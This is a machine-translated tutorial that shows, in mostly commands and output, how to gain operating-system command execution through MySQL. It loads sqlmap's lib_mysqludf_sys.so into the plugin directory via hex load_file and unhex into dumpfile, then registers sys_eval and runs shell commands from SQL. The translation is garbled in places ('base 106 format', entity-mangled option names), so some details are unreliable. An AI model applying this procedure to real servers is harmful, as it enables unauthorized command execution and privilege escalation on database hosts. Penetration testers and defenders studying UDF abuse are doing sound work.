Linux USES the UDF library to achieve Mysql rights
- 2020-06-23 02:05:03
- OfStack
Environment:
os:linux(bt5)
database:mysql
Description:
The custom library functions are used to implement arbitrary program execution, which is only tested under linux. In the case of windows, the dll is naturally different.
Requirements:
You must have the func table under the mysql library and in ‑ The & # 8209; skip & # 8209; grant & # 8209; If tables is turned on, UDF will be banned.
Procedure: get the path of the plug-in library, find the udf library file of the corresponding operating system, use the udf library file to load the function and execute the command
1, get the plug-in library path
mysql> show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value |
+---------------+-----------------------+
| plugin_dir | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)
2. Find the udf library file of the corresponding operating system
Because of my own test, I looked at the version of my own system, 64-bit
root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
For udf files, you'll find them in the sqlmap tool, just look for the version of the operating system
root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32 64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so
3. Use the udf library file to load functions and execute commands
The first step is to get the base 106 format of the udf library file, which can be accessed locally
mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)
Since I used my own account name mysql instead of root during the test, the plug-in directory could not be written. However, in reality, udf 1 generally started the mysql program with root permissions. Therefore, there was no insufficient access to the directory permissions. To continue, modify the directory permissions
root@bt:~# chmod 777 /usr/lib/mysql/plugin
Write udf library to mysql library directory in the database:
mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)
Take a look at the functions supported by the udf library
root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
w _Jv_RegisterClasses
0000000000201788 A __bss_start
w __cxa_finalize
w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
U fgets
U fork
U free
U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
U malloc
U mmap
U pclose
U popen
U realloc
U setenv
U strcpy
U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
U sysconf
U system
U waitpid
Finally, the function is loaded and executed:
mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql |
+--------------------+
1 row in set (0.04 sec)
mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name | ret | dl | type |
+----------+-----+-------------+----------+
| sys_eval | 0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set